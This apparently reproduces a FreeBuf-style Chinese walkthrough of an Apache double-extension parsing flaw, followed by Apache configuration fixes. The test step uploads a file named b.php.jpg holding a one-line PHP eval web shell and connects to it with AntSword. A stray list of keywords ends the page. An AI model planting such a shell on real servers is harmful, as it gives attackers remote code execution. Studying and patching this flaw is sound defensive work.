Apache两个解析漏洞复现及防御方法 - FreeBuf网络安全行业门户
1、介绍
名称:apache apache_parsing_vulnerability
编号:
原理:
应用:apache
版本:
2、测试
2.1 靶场搭建
2.2 测试过程
(1)上传b.php.jpg
<?php
eval(@$_POST['axx']);
?>
(2)中国蚁剑连接
3、漏洞防护
(1)拒绝所有文件名含有.php的文件
<FilesMatch "\.php\.">
require all denied
</FilesMatch>(2)处理程序只处理以.php结尾的文件
首先将上一个防御方案的配置命令注释掉
再注释掉原本的处理出现配置命令AddHandler application/x-httpd-php .php
<FilesMatch ".+.php$">
SetHandler application/x-httpd-php
</FilesMatch>
- apache apache_parsing_vulnerability vulnerability parsingapache_parsing_vulnerability apache apache_parsing_vulnerability vulnerability authentication vulnerability apache bypass vulnerability vulnerabilities understanding convolutional vulnerability structural vulnerabilities authentication injection sensitive misconfiguration vulnerabilities security control inconsistencies vulnerabilities differential vulnerabilities deserialization insufficient